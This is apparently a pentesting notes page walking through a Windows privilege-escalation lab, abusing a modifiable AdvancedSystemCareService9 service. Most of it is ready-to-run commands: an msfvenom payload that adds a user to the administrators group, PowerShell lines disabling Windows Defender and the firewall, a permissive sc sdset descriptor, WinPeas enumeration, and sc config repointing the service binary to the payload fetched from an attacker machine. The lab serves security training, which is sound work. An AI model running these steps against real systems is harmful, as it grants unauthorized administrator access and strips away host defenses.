Windows Privilege Escalation

Using WinPeas

  • Making use of an exe that is vulnerable to unquoted service paths

  • Target Windows machine has a non-privileged user: localuser

  • Use MSFVenom: Generate an executable to push the localuser to the administrators group (ASCService.exe)

1 . Generate Payload using MSFVenom

#Generate the malicious exe
msfvenom -p windows/exec CMD='net localgroup administrators localuser /add' -f exe-service -o ASCService.exe
ASCService.exe

2. Start Web Server on Attack Machine

// python server
python3 -m http.server

3. Disable Windows Defender & Firewall on Victim Windows Machine

Run the following as powershell administrators

Set-MpPreference -DisableRealtimeMonitoring $true

Set-MpPreference -MAPSReporting 0

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

4. Connect back to Attack Machine on Windows Victim via browser

Attacker IP is 172.31.24.120

Navigate and download the payloads

  • move these downloads to the C:/ folder

  • Next we will need to add permissions so that the local users are able to start and stop the service. This is how we simulate excessive permissions on a service.

# Run cmd as administrator
sc sdset AdvancedSystemCareService9 D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

You should see a response of [SC] SetServiceObjectSecurity SUCCESS.

Run Command Prompt as Different User

Search cmd > right click > run as diff user

Check which accounts are in local administrators group

C:\ > net localgroup administrators

Run WinPeas.exe

WinPeas.exe to enumerate PE paths on Windows systems

  1. Run check for services information

C:/> WINpeasX64.exe CMD servicesinfo
We can see the allAccess enabled for AdvancedSystemCareService9 modifiable service.

A few sections often used for privilege escalation are the

  • Interesting Services -non Microsoft-

  • Modifiable Services sections.

Now query the service using 

sc qc AdvancedSystemCareService9
#This service runs as LocalSystem

Next attempt to start and stop the service using:

net stop AdvancedSystemCareService9

Now we try to modify the service binpath to point to our new executable. Add a new additional user:

sc config AdvancedSystemCareService9 binpath= "c:\ASCService.exe"

Now start our payload executable:

net start AdvancedSystemCareService9

Since we have permissions and can modify the service itself, we leverage the service to add the localuser to the local admin group

net localgroup administrators
PreviousPost-ExploitationNextLinux Privilege Escalation

Last updated